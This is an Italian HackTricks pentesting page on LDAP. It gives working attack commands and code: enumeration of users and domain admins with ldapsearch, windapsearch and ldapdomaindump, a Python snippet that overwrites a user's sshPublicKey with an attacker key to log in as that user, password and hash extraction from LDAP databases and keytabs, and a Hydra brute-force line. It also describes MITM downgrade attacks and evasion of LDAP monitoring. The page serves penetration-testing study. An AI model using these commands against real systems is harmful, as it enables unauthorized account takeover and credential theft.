389, 636, 3268, 3269 - Pentesting LDAP

Reading time: 13 minutes

tip

Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

L'uso di LDAP (Lightweight Directory Access Protocol) è principalmente per localizzare varie entità come organizzazioni, individui e risorse come file e dispositivi all'interno delle reti, sia pubbliche che private. Offre un approccio semplificato rispetto al suo predecessore, DAP, avendo un'impronta di codice più piccola.

Le directory LDAP sono strutturate per consentirne la distribuzione su più server, con ogni server che ospita una versione replicata e sincronizzata della directory, chiamata Directory System Agent (DSA). La responsabilità per la gestione delle richieste è interamente del server LDAP, che può comunicare con altri DSA secondo necessità per fornire una risposta unificata al richiedente.

L'organizzazione della directory LDAP assomiglia a una gerarchia ad albero, partendo dalla directory radice in cima. Questa si ramifica in paesi, che si dividono ulteriormente in organizzazioni, e poi in unità organizzative che rappresentano varie divisioni o dipartimenti, raggiungendo infine il livello delle singole entità, comprese sia le persone che le risorse condivise come file e stampanti.

Porta predefinita: 389 e 636(ldaps). Il Catalogo Globale (LDAP in ActiveDirectory) è disponibile per impostazione predefinita sulle porte 3268 e 3269 per LDAPS.

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

LDAP Data Interchange Format

LDIF (LDAP Data Interchange Format) definisce il contenuto della directory come un insieme di record. Può anche rappresentare richieste di aggiornamento (Aggiungi, Modifica, Elimina, Rinomina).

bash
dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
  • Le righe 1-3 definiscono il dominio di primo livello locale
  • Le righe 5-8 definiscono il dominio di primo livello moneycorp (moneycorp.local)
  • Le righe 10-16 definiscono 2 unità organizzative: dev e sales
  • Le righe 18-26 creano un oggetto del dominio e assegnano attributi con valori

Scrivi dati

Nota che se puoi modificare i valori potresti essere in grado di eseguire azioni davvero interessanti. Ad esempio, immagina che puoi cambiare le informazioni "sshPublicKey" del tuo utente o di qualsiasi utente. È altamente probabile che se questo attributo esiste, allora ssh sta leggendo le chiavi pubbliche da LDAP. Se puoi modificare la chiave pubblica di un utente sarai in grado di accedere come quell'utente anche se l'autenticazione con password non è abilitata in ssh.

bash
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

Sniff clear text credentials

Se LDAP viene utilizzato senza SSL, puoi sniffare le credenziali in chiaro nella rete.

Inoltre, puoi eseguire un attacco MITM nella rete tra il server LDAP e il client. Qui puoi effettuare un Downgrade Attack in modo che il client utilizzi le credenziali in chiaro per accedere.

Se SSL è utilizzato, puoi provare a fare MITM come menzionato sopra, offrendo un certificato falso; se l'utente lo accetta, puoi effettuare il Downgrade del metodo di autenticazione e vedere di nuovo le credenziali.

Anonymous Access

Bypass TLS SNI check

Secondo questo writeup, semplicemente accedendo al server LDAP con un nome di dominio arbitrario (come company.com), è stato in grado di contattare il servizio LDAP ed estrarre informazioni come utente anonimo:

bash
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

LDAP anonymous binds

LDAP anonymous binds consentono a attaccanti non autenticati di recuperare informazioni dal dominio, come un elenco completo di utenti, gruppi, computer, attributi degli account utente e la politica delle password del dominio. Questa è una configurazione legacy, e a partire da Windows Server 2003, solo gli utenti autenticati sono autorizzati a iniziare richieste LDAP.
Tuttavia, gli amministratori potrebbero aver dovuto configurare un'applicazione particolare per consentire i bind anonimi e aver dato più accesso di quanto previsto, dando così agli utenti non autenticati accesso a tutti gli oggetti in AD.

Valid Credentials

Se hai credenziali valide per accedere al server LDAP, puoi estrarre tutte le informazioni sull'Amministratore di Dominio utilizzando:

ldapdomaindump

bash
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Brute Force

Enumerazione

Automatizzato

Utilizzando questo, sarai in grado di vedere le informazioni pubbliche (come il nome di dominio):

bash
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

Python

Vedi l'enumerazione LDAP con python

Puoi provare a enumerare un LDAP con o senza credenziali usando python: pip3 install ldap3

Prima prova a connetterti senza credenziali:

bash
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

Se la risposta è True come nell'esempio precedente, puoi ottenere alcuni dati interessanti del server LDAP (come il contesto di denominazione o il nome di dominio) da:

bash
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

Una volta che hai il contesto di denominazione, puoi fare alcune query più interessanti. Questa semplice query dovrebbe mostrarti tutti gli oggetti nella directory:

bash
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

O dump l'intero ldap:

bash
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch è uno script Python utile per enumerare utenti, gruppi e computer da un dominio Windows utilizzando query LDAP.

bash
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Controlla le credenziali nulle o se le tue credenziali sono valide:

bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
bash
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

Se trovi qualcosa che dice che il "bind deve essere completato" significa che le credenziali non sono corrette.

Puoi estrarre tutto da un dominio usando:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

Estrai utenti:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

Estrai computer:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

Estrai le mie informazioni:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Estrai Domain Admins:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Estrai Utenti di Dominio:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Estrai Enterprise Admins:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Estrai Amministratori:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Estrai Remote Desktop Group:

bash
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Per vedere se hai accesso a qualche password, puoi usare grep dopo aver eseguito una delle query:

bash
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

Si prega di notare che le password che puoi trovare qui potrebbero non essere quelle reali...

pbis

Puoi scaricare pbis da qui: https://github.com/BeyondTrust/pbis-open/ e di solito è installato in /opt/pbis.
Pbis ti consente di ottenere facilmente informazioni di base:

bash
#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

Interfaccia Grafica

Apache Directory

Scarica Apache Directory da qui. Puoi trovare un esempio di come utilizzare questo strumento qui.

jxplorer

Puoi scaricare un'interfaccia grafica con server LDAP qui: http://www.jxplorer.org/downloads/users.html

Per impostazione predefinita è installato in: /opt/jxplorer

Godap

Godap è un'interfaccia utente terminale interattiva per LDAP che può essere utilizzata per interagire con oggetti e attributi in AD e altri server LDAP. È disponibile per Windows, Linux e MacOS e supporta bind semplici, pass-the-hash, pass-the-ticket e pass-the-cert, insieme a diverse altre funzionalità specializzate come cercare/creare/cambiare/cancellare oggetti, aggiungere/rimuovere utenti dai gruppi, cambiare password, modificare permessi sugli oggetti (DACL), modificare DNS integrato in Active Directory (ADIDNS), esportare in file JSON, ecc.

Puoi accedervi in https://github.com/Macmod/godap. Per esempi di utilizzo e istruzioni leggi il Wiki.

Ldapx

Ldapx è un proxy LDAP flessibile che può essere utilizzato per ispezionare e trasformare il traffico LDAP da altri strumenti. Può essere utilizzato per offuscare il traffico LDAP per tentare di eludere gli strumenti di protezione dell'identità e di monitoraggio LDAP e implementa la maggior parte dei metodi presentati nel talk MaLDAPtive.

Puoi ottenerlo da https://github.com/Macmod/ldapx.

Autenticazione tramite kerberos

Utilizzando ldapsearch puoi autenticarti contro kerberos invece di tramite NTLM utilizzando il parametro -Y GSSAPI

POST

Se puoi accedere ai file dove sono contenute le basi di dati (potrebbero trovarsi in /var/lib/ldap). Puoi estrarre gli hash utilizzando:

bash
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

Puoi fornire a john l'hash della password (da '{SSHA}' a 'structural' senza aggiungere 'structural').

File di Configurazione

  • Generale
  • containers.ldif
  • ldap.cfg
  • ldap.conf
  • ldap.xml
  • ldap-config.xml
  • ldap-realm.xml
  • slapd.conf
  • IBM SecureWay V3 server
  • V3.sas.oc
  • Microsoft Active Directory server
  • msadClassesAttrs.ldif
  • Netscape Directory Server 4
  • nsslapd.sas_at.conf
  • nsslapd.sas_oc.conf
  • OpenLDAP directory server
  • slapd.sas_at.conf
  • slapd.sas_oc.conf
  • Sun ONE Directory Server 5.1
  • 75sas.ldif

HackTricks Comandi Automatici

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

tip

Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks